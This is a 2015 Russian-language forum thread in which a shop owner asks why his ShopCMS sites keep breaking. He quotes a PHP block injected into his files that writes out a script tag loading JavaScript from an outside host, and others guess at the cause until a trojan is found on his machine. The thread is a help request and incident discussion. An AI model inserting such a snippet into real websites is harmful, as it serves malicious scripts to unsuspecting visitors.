Перейти к содержимому


Уязвимость магазина!


  • Вы не можете ответить в тему
Сообщений в теме: 6

#1 G_S

    Пользователь

  • Assistent vsupport.club
  • PipPip
  • 10 сообщений
Репутация: 0
Начинающий

Отправлено 05 June 2015 - 11:26 AM

Уважаемые форумчане, столкнулся с проблемой(
Вчера все магазины начали валится, после просмотра файлов обнаружено, что файлы модифицированы вот такой записью
<?php
#bb45df#
if(empty($mb)) {
$mb = "<script type=\"text/javascript\" src=\"http://qadance.com/xn6txclf.php?id=778790\"></script>";
echo $mb;
}
#/bb45df#
?>

откуда эта фигня лезит не понятно, кто может знает?

за ранее спасибо!
  • 0

#2 badisoft

    Продвинутый пользователь

  • Assistent vsupport.club
  • PipPipPip
  • 5075 сообщений
Репутация: 786
Мастер

Отправлено 05 June 2015 - 01:55 PM

откуда эта фигня лезит не понятно, кто может знает?

С большой вероятностью из установленной рядом Джумлы. Или еще какой-либо дырчатой CMS.
  • 0
http://cpu.badisoft.ru (тестовый сайт), http://badisoft.ru (модули)

#3 G_S

    Пользователь

  • Assistent vsupport.club
  • PipPip
  • 10 сообщений
Репутация: 0
Начинающий

Отправлено 08 June 2015 - 04:13 PM

откуда эта фигня лезит не понятно, кто может знает?

С большой вероятностью из установленной рядом Джумлы. Или еще какой-либо дырчатой CMS.


Теперь обнаружилось, что такая же фигня с shopcms, на хостинге только один сайт, может это уязвимость shopcms? версия shopcms 3.1.2
  • 0

#4 eugene_wb

    Продвинутый пользователь

  • Модераторы
  • 827 сообщений
Репутация: 167
Мастер

Отправлено 08 June 2015 - 07:39 PM

а может дырявый хостинг, склепанный а коленке, в котором при заливке шелла в один аккаунт смело гуляем по серваку
  • 0
Изображение Изображение Изображение

#5 G_S

    Пользователь

  • Assistent vsupport.club
  • PipPip
  • 10 сообщений
Репутация: 0
Начинающий

Отправлено 09 June 2015 - 04:11 PM

Дело в том что сайты на разных хостингах(

устал восстанавливать с бекапа
  • 0

#6 R.Sergey

    Администратор

  • Администраторы
  • 2810 сообщений
Репутация: 332
Мастер

Отправлено 09 June 2015 - 04:14 PM

Значит вирусы на компе... уводят пароли или от фтп или от админок, а из админки уже заливают шеллы и т.д.
  • 0

#7 G_S

    Пользователь

  • Assistent vsupport.club
  • PipPip
  • 10 сообщений
Репутация: 0
Начинающий

Отправлено 11 June 2015 - 10:41 AM

Всем спасибо проблема решилась! Тему можно закрывать, все дело было в трояне который слушал 21 порт.
  • 0